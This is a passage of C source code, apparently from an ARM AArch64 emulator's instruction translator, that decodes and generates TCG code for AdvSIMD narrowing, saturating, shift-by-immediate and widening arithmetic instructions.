pass < passes; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); NeonGenNarrowFn *genfn = NULL; NeonGenNarrowEnvFn *genenvfn = NULL; if (scalar) { read_vec_element(s, tcg_op, rn, pass, size + 1); } else { read_vec_element(s, tcg_op, rn, pass, MO_64); } tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x12: /* XTN, SQXTUN */ { static NeonGenNarrowFn * const xtnfns[3] = { gen_helper_neon_narrow_u8, gen_helper_neon_narrow_u16, tcg_gen_extrl_i64_i32, }; static NeonGenNarrowEnvFn * const sqxtunfns[3] = { gen_helper_neon_unarrow_sat8, gen_helper_neon_unarrow_sat16, gen_helper_neon_unarrow_sat32, }; if (u) { genenvfn = sqxtunfns[size]; } else { genfn = xtnfns[size]; } break; } case 0x14: /* SQXTN, UQXTN */ { static NeonGenNarrowEnvFn * const fns[3][2] = { { gen_helper_neon_narrow_sat_s8, gen_helper_neon_narrow_sat_u8 }, { gen_helper_neon_narrow_sat_s16, gen_helper_neon_narrow_sat_u16 }, { gen_helper_neon_narrow_sat_s32, gen_helper_neon_narrow_sat_u32 }, }; genenvfn = fns[size][u]; break; } case 0x16: /* FCVTN, FCVTN2 */ /* 32 bit to 16 bit or 64 bit to 32 bit float conversion */ if (size == 2) { gen_helper_vfp_fcvtsd(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); } else { TCGv_i32 tcg_lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_hi = tcg_temp_new_i32(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); tcg_gen_extr_i64_i32(tcg_ctx, tcg_lo, tcg_hi, tcg_op); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_lo, tcg_lo, fpst, ahp); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_hi, tcg_hi, fpst, ahp); tcg_gen_deposit_i32(tcg_ctx, tcg_res[pass], tcg_lo, tcg_hi, 16, 16); tcg_temp_free_i32(tcg_ctx, tcg_lo); tcg_temp_free_i32(tcg_ctx, tcg_hi); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, ahp); } break; case 0x56: /* FCVTXN, FCVTXN2 */ /* 64 bit to 32 bit float conversion * with von Neumann rounding (round to odd) */ assert(size == 2); gen_helper_fcvtx_f64_to_f32(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); break; default: g_assert_not_reached(); } if (genfn) { genfn(tcg_ctx, tcg_res[pass], tcg_op); } else if (genenvfn) { genenvfn(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_op); } tcg_temp_free_i64(tcg_ctx, tcg_op); } for (pass = 0; pass < 2; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, destelt + pass, MO_32); 
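/* destelt steers the narrowed results into the high half of Rd for the second-half ('2') variants. */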
tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } clear_vec_high(s, is_q, rd); } /* Remaining saturating accumulating ops */ static void handle_2misc_satacc(DisasContext *s, bool is_scalar, bool is_u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_double = (size == 3); if (is_double) { TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); int pass; for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { read_vec_element(s, tcg_rn, rn, pass, MO_64); read_vec_element(s, tcg_rd, rd, pass, MO_64); if (is_u) { /* USQADD */ gen_helper_neon_uqadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); } else { /* SUQADD */ gen_helper_neon_sqadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); } write_vec_element(s, tcg_rd, rd, pass, MO_64); } tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); int pass, maxpasses; if (is_scalar) { maxpasses = 1; } else { maxpasses = is_q ? 4 : 2; } for (pass = 0; pass < maxpasses; pass++) { if (is_scalar) { read_vec_element_i32(s, tcg_rn, rn, pass, size); read_vec_element_i32(s, tcg_rd, rd, pass, size); } else { read_vec_element_i32(s, tcg_rn, rn, pass, MO_32); read_vec_element_i32(s, tcg_rd, rd, pass, MO_32); } if (is_u) { /* USQADD */ switch (size) { case 0: gen_helper_neon_uqadd_s8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 1: gen_helper_neon_uqadd_s16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 2: gen_helper_neon_uqadd_s32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; default: g_assert_not_reached(); } } else { /* SUQADD */ switch (size) { case 0: gen_helper_neon_sqadd_u8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 1: gen_helper_neon_sqadd_u16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 2: gen_helper_neon_sqadd_u32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; default: g_assert_not_reached(); } } if (is_scalar) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); write_vec_element(s, tcg_zero, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_zero); } write_vec_element_i32(s, tcg_rd, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rn); clear_vec_high(s, is_q, rd); } } /* AdvSIMD scalar two reg misc * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----+---+-----------+------+-----------+--------+-----+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | * +-----+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_scalar_two_reg_misc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 12, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); bool is_fcvt = false; int rmode; TCGv_i32 tcg_rmode; TCGv_ptr tcg_fpstatus; switch (opcode) { case 0x3: /* USQADD / SUQADD*/ if (!fp_access_check(s)) { return; } handle_2misc_satacc(s, true, u, false, size, rn, rd); return; case 0x7: /* SQABS / SQNEG */ break; case 0xa: /* CMLT */ if (u) { unallocated_encoding(s); return; } /* fall through */ case 0x8: /* CMGT, CMGE */ case 0x9: /* CMEQ, CMLE */ case 0xb: /* ABS, NEG */ if (size != 3) { unallocated_encoding(s); return; } break; case 0x12: /* SQXTUN */ if (!u) { unallocated_encoding(s); return; } /* fall through */ 
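/* SQXTUN shares the narrowing path with SQXTN/UQXTN below. */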
case 0x14: /* SQXTN, UQXTN */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, true, opcode, u, false, size, rn, rd); return; case 0xc: case 0xd: case 0xe: case 0xf: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1f: /* Floating point: U, size[1] and opcode indicate operation; * size[0] indicates single or double precision. */ opcode |= (extract32(size, 1, 1) << 5) | (u << 6); size = extract32(size, 0, 1) ? 3 : 2; switch (opcode) { case 0x2c: /* FCMGT (zero) */ case 0x2d: /* FCMEQ (zero) */ case 0x2e: /* FCMLT (zero) */ case 0x6c: /* FCMGE (zero) */ case 0x6d: /* FCMLE (zero) */ handle_2misc_fcmp_zero(s, opcode, true, u, true, size, rn, rd); return; case 0x1d: /* SCVTF */ case 0x5d: /* UCVTF */ { bool is_signed = (opcode == 0x1d); if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, 1, is_signed, 0, size); return; } case 0x3d: /* FRECPE */ case 0x3f: /* FRECPX */ case 0x7d: /* FRSQRTE */ if (!fp_access_check(s)) { return; } handle_2misc_reciprocal(s, opcode, true, u, true, size, rn, rd); return; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ is_fcvt = true; rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); break; case 0x1c: /* FCVTAS */ case 0x5c: /* FCVTAU */ /* TIEAWAY doesn't fit in the usual rounding mode encoding */ is_fcvt = true; rmode = FPROUNDING_TIEAWAY; break; case 0x56: /* FCVTXN, FCVTXN2 */ if (size == 2) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, true, opcode, u, false, size - 1, rn, rd); return; default: unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (is_fcvt) { tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, false); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); } else { tcg_rmode = NULL; tcg_fpstatus = NULL; } if (size == 3) { TCGv_i64 tcg_rn = read_fp_dreg(s, rn); TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); handle_2misc_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rmode, tcg_fpstatus); write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); } else { TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_rn, rn, 0, size); switch (opcode) { case 0x7: /* SQABS, SQNEG */ { NeonGenOneOpEnvFn *genfn; static NeonGenOneOpEnvFn * const fns[3][2] = { { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, { gen_helper_neon_qabs_s32, gen_helper_neon_qneg_s32 }, }; genfn = fns[size][u]; genfn(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); break; } case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_tosls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_touls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } default: 
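/* every other opcode has been filtered out by the decode above */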
g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rn); } if (is_fcvt) { gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); } } /* SSHR[RA]/USHR[RA] - Vector shift right (optional rounding/accumulate) */ static void handle_vec_simd_shri(DisasContext *s, bool is_q, bool is_u, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = 2 * (8 << size) - immhb; bool accumulate = false; int dsize = is_q ? 128 : 64; int esize = 8 << size; int elements = dsize/esize; MemOp memop = size | (is_u ? 0 : MO_SIGN); TCGv_i64 tcg_rn = new_tmp_a64(s); TCGv_i64 tcg_rd = new_tmp_a64(s); TCGv_i64 tcg_round; uint64_t round_const; int i; if (extract32(immh, 3, 1) && !is_q) { unallocated_encoding(s); return; } tcg_debug_assert(size <= 3); if (!fp_access_check(s)) { return; } switch (opcode) { case 0x02: /* SSRA / USRA (accumulate) */ if (is_u) { /* Shift count same as element size produces zero to add. */ if (shift == 8 << size) { goto done; } gen_gvec_op2i(s, is_q, rd, rn, shift, &usra_op[size]); } else { /* Shift count same as element size produces all sign to add. */ if (shift == 8 << size) { shift -= 1; } gen_gvec_op2i(s, is_q, rd, rn, shift, &ssra_op[size]); } return; case 0x08: /* SRI */ /* Shift count same as element size is valid but does nothing. */ if (shift == 8 << size) { goto done; } gen_gvec_op2i(s, is_q, rd, rn, shift, &sri_op[size]); return; case 0x00: /* SSHR / USHR */ if (is_u) { if (shift == 8 << size) { /* Shift count the same size as element size produces zero. */ tcg_gen_gvec_dup8i(tcg_ctx, vec_full_reg_offset(s, rd), is_q ? 16 : 8, vec_full_reg_size(s), 0); } else { gen_gvec_fn2i(s, is_q, rd, rn, shift, tcg_gen_gvec_shri, size); } } else { /* Shift count the same size as element size produces all sign. 
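* An arithmetic shift by esize - 1 produces the same all-sign result, so the shift count is clamped to that.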
*/ if (shift == 8 << size) { shift -= 1; } gen_gvec_fn2i(s, is_q, rd, rn, shift, tcg_gen_gvec_sari, size); } return; case 0x04: /* SRSHR / URSHR (rounding) */ break; case 0x06: /* SRSRA / URSRA (accum + rounding) */ accumulate = true; break; default: g_assert_not_reached(); } round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); for (i = 0; i < elements; i++) { read_vec_element(s, tcg_rn, rn, i, memop); if (accumulate) { read_vec_element(s, tcg_rd, rd, i, memop); } handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, accumulate, is_u, size, shift); write_vec_element(s, tcg_rd, rd, i, size); } tcg_temp_free_i64(tcg_ctx, tcg_round); done: clear_vec_high(s, is_q, rd); } /* SHL/SLI - Vector shift left */ static void handle_vec_simd_shli(DisasContext *s, bool is_q, bool insert, int immh, int immb, int opcode, int rn, int rd) { int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = immhb - (8 << size); /* Range of size is limited by decode: immh is a non-zero 4 bit field */ assert(size >= 0 && size <= 3); if (extract32(immh, 3, 1) && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (insert) { gen_gvec_op2i(s, is_q, rd, rn, shift, &sli_op[size]); } else { gen_gvec_fn2i(s, is_q, rd, rn, shift, tcg_gen_gvec_shli, size); } } /* USHLL/SHLL - Vector shift left with widening */ static void handle_vec_simd_wshli(DisasContext *s, bool is_q, bool is_u, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = immhb - (8 << size); int dsize = 64; int esize = 8 << size; int elements = dsize/esize; TCGv_i64 tcg_rn = new_tmp_a64(s); TCGv_i64 tcg_rd = new_tmp_a64(s); int i; if (size >= 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* For the LL variants the store is larger than the load, * so if rd == rn we would overwrite parts of our input. * So load everything right now and use shifts in the main loop. */ read_vec_element(s, tcg_rn, rn, is_q ? 1 : 0, MO_64); for (i = 0; i < elements; i++) { tcg_gen_shri_i64(tcg_ctx, tcg_rd, tcg_rn, i * esize); ext_and_shift_reg(tcg_ctx, tcg_rd, tcg_rd, size | (!is_u << 2), 0); tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, shift); write_vec_element(s, tcg_rd, rd, i, size + 1); } } /* SHRN/RSHRN - Shift right with narrowing (and potential rounding) */ static void handle_vec_simd_shrn(DisasContext *s, bool is_q, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int size = 32 - clz32(immh) - 1; int dsize = 64; int esize = 8 << size; int elements = dsize/esize; int shift = (2 * esize) - immhb; bool round = extract32(opcode, 0, 1); TCGv_i64 tcg_rn, tcg_rd, tcg_final; TCGv_i64 tcg_round; int i; if (extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rn = tcg_temp_new_i64(tcg_ctx); tcg_rd = tcg_temp_new_i64(tcg_ctx); tcg_final = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_final, rd, is_q ? 
1 : 0, MO_64); if (round) { uint64_t round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); } else { tcg_round = NULL; } for (i = 0; i < elements; i++) { read_vec_element(s, tcg_rn, rn, i, size+1); handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, false, true, size+1, shift); tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); } if (!is_q) { write_vec_element(s, tcg_final, rd, 0, MO_64); } else { write_vec_element(s, tcg_final, rd, 1, MO_64); } if (round) { tcg_temp_free_i64(tcg_ctx, tcg_round); } tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_final); clear_vec_high(s, is_q, rd); } /* AdvSIMD shift by immediate * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 * +---+---+---+-------------+------+------+--------+---+------+------+ * | 0 | Q | U | 0 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | * +---+---+---+-------------+------+------+--------+---+------+------+ */ static void disas_simd_shift_imm(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 5); int immb = extract32(insn, 16, 3); int immh = extract32(insn, 19, 4); bool is_u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); /* data_proc_simd[] has sent immh == 0 to disas_simd_mod_imm. */ assert(immh != 0); switch (opcode) { case 0x08: /* SRI */ if (!is_u) { unallocated_encoding(s); return; } /* fall through */ case 0x00: /* SSHR / USHR */ case 0x02: /* SSRA / USRA (accumulate) */ case 0x04: /* SRSHR / URSHR (rounding) */ case 0x06: /* SRSRA / URSRA (accum + rounding) */ handle_vec_simd_shri(s, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0x0a: /* SHL / SLI */ handle_vec_simd_shli(s, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0x10: /* SHRN */ case 0x11: /* RSHRN / SQRSHRUN */ if (is_u) { handle_vec_simd_sqshrn(s, false, is_q, false, true, immh, immb, opcode, rn, rd); } else { handle_vec_simd_shrn(s, is_q, immh, immb, opcode, rn, rd); } break; case 0x12: /* SQSHRN / UQSHRN */ case 0x13: /* SQRSHRN / UQRSHRN */ handle_vec_simd_sqshrn(s, false, is_q, is_u, is_u, immh, immb, opcode, rn, rd); break; case 0x14: /* SSHLL / USHLL */ handle_vec_simd_wshli(s, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0x1c: /* SCVTF / UCVTF */ handle_simd_shift_intfp_conv(s, false, is_q, is_u, immh, immb, opcode, rn, rd); break; case 0xc: /* SQSHLU */ if (!is_u) { unallocated_encoding(s); return; } handle_simd_qshl(s, false, is_q, false, true, immh, immb, rn, rd); break; case 0xe: /* SQSHL, UQSHL */ handle_simd_qshl(s, false, is_q, is_u, is_u, immh, immb, rn, rd); break; case 0x1f: /* FCVTZS/ FCVTZU */ handle_simd_shift_fpint_conv(s, false, is_q, is_u, immh, immb, rn, rd); return; default: unallocated_encoding(s); return; } } /* Generate code to do a "long" addition or subtraction, ie one done in * TCGv_i64 on vector lanes twice the width specified by size. 
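* Sizes 0 and 1 use helpers that add or subtract the packed 16-bit or 32-bit lanes of a 64-bit value; size 2 maps directly to a single 64-bit add/sub.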
*/ static void gen_neon_addl(TCGContext *tcg_ctx, int size, bool is_sub, TCGv_i64 tcg_res, TCGv_i64 tcg_op1, TCGv_i64 tcg_op2) { static NeonGenTwo64OpFn * const fns[3][2] = { { gen_helper_neon_addl_u16, gen_helper_neon_subl_u16 }, { gen_helper_neon_addl_u32, gen_helper_neon_subl_u32 }, { tcg_gen_add_i64, tcg_gen_sub_i64 }, }; NeonGenTwo64OpFn *genfn; assert(size < 3); genfn = fns[size][is_sub]; genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); } static void handle_3rd_widening(DisasContext *s, int is_q, int is_u, int size, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* 3-reg-different widening insns: 64 x 64 -> 128 */ TCGv_i64 tcg_res[2]; int pass, accop; tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); /* Does this op do an adding accumulate, a subtracting accumulate, * or no accumulate at all? */ switch (opcode) { case 5: case 8: case 9: accop = 1; break; case 10: case 11: accop = -1; break; default: accop = 0; break; } if (accop != 0) { read_vec_element(s, tcg_res[0], rd, 0, MO_64); read_vec_element(s, tcg_res[1], rd, 1, MO_64); } /* size == 2 means two 32x32->64 operations; this is worth special * casing because we can generally handle it inline. */ if (size == 2) { for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_passres; MemOp memop = MO_32 | (is_u ? 0 : MO_SIGN); int elt = pass + is_q * 2; read_vec_element(s, tcg_op1, rn, elt, memop); read_vec_element(s, tcg_op2, rm, elt, memop); if (accop == 0) { tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } switch (opcode) { case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ tcg_gen_add_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); break; case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ tcg_gen_sub_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); break; case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ { TCGv_i64 tcg_tmp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_tmp2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, tcg_tmp1, tcg_op1, tcg_op2); tcg_gen_sub_i64(tcg_ctx, tcg_tmp2, tcg_op2, tcg_op1); tcg_gen_movcond_i64(tcg_ctx, is_u ? 
TCG_COND_GEU : TCG_COND_GE, tcg_passres, tcg_op1, tcg_op2, tcg_tmp1, tcg_tmp2); tcg_temp_free_i64(tcg_ctx, tcg_tmp1); tcg_temp_free_i64(tcg_ctx, tcg_tmp2); break; } case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); break; case 9: /* SQDMLAL, SQDMLAL2 */ case 11: /* SQDMLSL, SQDMLSL2 */ case 13: /* SQDMULL, SQDMULL2 */ tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); break; default: g_assert_not_reached(); } if (opcode == 9 || opcode == 11) { /* saturating accumulate ops */ if (accop < 0) { tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); } gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); } else if (accop > 0) { tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); } else if (accop < 0) { tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); } if (accop != 0) { tcg_temp_free_i64(tcg_ctx, tcg_passres); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } } else { /* size 0 or 1, generally helper functions */ for (pass = 0; pass < 2; pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 tcg_passres; int elt = pass + is_q * 2; read_vec_element_i32(s, tcg_op1, rn, elt, MO_32); read_vec_element_i32(s, tcg_op2, rm, elt, MO_32); if (accop == 0) { tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } switch (opcode) { case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ { TCGv_i64 tcg_op2_64 = tcg_temp_new_i64(tcg_ctx); static NeonGenWidenFn * const widenfns[2][2] = { { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, }; NeonGenWidenFn *widenfn = widenfns[size][is_u]; widenfn(tcg_ctx, tcg_op2_64, tcg_op2); widenfn(tcg_ctx, tcg_passres, tcg_op1); gen_neon_addl(tcg_ctx, size, (opcode == 2), tcg_passres, tcg_passres, tcg_op2_64); tcg_temp_free_i64(tcg_ctx, tcg_op2_64); break; } case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ if (size == 0) { if (is_u) { gen_helper_neon_abdl_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_abdl_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } else { if (is_u) { gen_helper_neon_abdl_u32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_abdl_s32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } break; case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ if (size == 0) { if (is_u) { gen_helper_neon_mull_u8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_mull_s8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } else { if (is_u) { gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } else { gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); } } break; case 9: /* SQDMLAL, SQDMLAL2 */ case 11: /* SQDMLSL, SQDMLSL2 */ case 13: /* SQDMULL, SQDMULL2 */ assert(size == 1); gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); if (accop != 
0) { if (opcode == 9 || opcode == 11) { /* saturating accumulate ops */ if (accop < 0) { gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); } gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); } else { gen_neon_addl(tcg_ctx, size, (accop < 0), tcg_res[pass], tcg_res[pass], tcg_passres); } tcg_temp_free_i64(tcg_ctx, tcg_passres); } } } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } static void handle_3rd_wide(DisasContext *s, int is_q, int is_u, int size, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_res[2]; int part = is_q ? 2 : 0; int pass; for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 tcg_op2_wide = tcg_temp_new_i64(tcg_ctx); static NeonGenWidenFn * const widenfns[3][2] = { { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, { tcg_gen_ext_i32_i64, tcg_gen_extu_i32_i64 }, }; NeonGenWidenFn *widenfn = widenfns[size][is_u]; read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element_i32(s, tcg_op2, rm, part + pass, MO_32); widenfn(tcg_ctx, tcg_op2_wide, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); gen_neon_addl(tcg_ctx, size, (opcode == 3), tcg_res[pass], tcg_op1, tcg_op2_wide); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2_wide); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); 